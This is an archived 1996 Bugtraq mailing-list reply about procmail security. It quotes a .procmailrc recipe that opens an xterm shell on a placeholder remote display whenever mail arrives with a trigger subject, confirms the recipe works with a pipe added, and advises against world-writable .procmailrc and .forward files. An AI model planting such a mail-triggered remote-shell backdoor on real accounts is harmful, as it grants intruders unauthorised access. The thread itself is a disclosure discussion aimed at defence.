Bugtraq mailing list archives

Re: procmail

From: ming () math uh edu (James Wang)
Date: Tue, 6 Aug 1996 17:58:29 -0500


On Tue, 6 Aug 1996, Neil Soveran-Charley wrote:

   I think there may well be such an exploit. I'd guess it is simply
 something like:

(.procmailrc contents)

:0 Hc
* ^Subject:.*APassword
/usr/bin/X11/xterm -display <some display> -e <a shell>

(end .procmailrc)

        I try it with a different usr account then my and it does work.
        It shows the owner as the person that receiving the mail.

        It needed a | in-front of /usr/bin/X11/xterm .....

        It might work with just the command in .forward.  So, it might not
only procmail's problem.  One must make sure his/her .procmailrc and
.forward are not world writable.


  I'm sure procmail MUST have some security feature to disallow this
sort of thing? But I could be wrong, and haven't checked the manual
pages yet.

        No.  Since there is no way for procmail to know before hand what
kind of program that you might use.

Current thread:

Re: Exploiting Zolaris 2.4 ?? :) Leif Hedstrom (Aug 04)
- <Possible follow-ups>
- Re: Exploiting Zolaris 2.4 ?? :) Fletch (Aug 04)
  - Re: your mail Greg Woods (Aug 05)
    - Re: your mail neill (Aug 05)
  - PAM login programs? Josh Wilmes (Aug 05)
    - procmail DANIEL .D .EZEKIEL (Aug 05)
    - (Fwd) CERT Advisory CA-96.17 - Vulnerability in Solaris vold Hubert Feyrer (Aug 06)
    - Re: procmail Adam Shostack (Aug 06)
    - Re: procmail Jon Lewis (Aug 06)
    - Re: procmail Neil Soveran-Charley (Aug 06)
    - Re: procmail James Wang (Aug 06)
    - Re: procmail Kari E. Hurtta (Aug 06)
    - Re: procmail Ficus Kirkpatrick (Aug 07)
    - Re: procmail Melody Lynn Yoon (Aug 07)
    - Re: PAM login programs? Marek Michalkiewicz (Aug 06)
    - Re: PAM login programs? Arthur Donkers (Aug 06)
- Re: Exploiting Zolaris 2.4 ?? :) Peter Jeremy (Aug 05)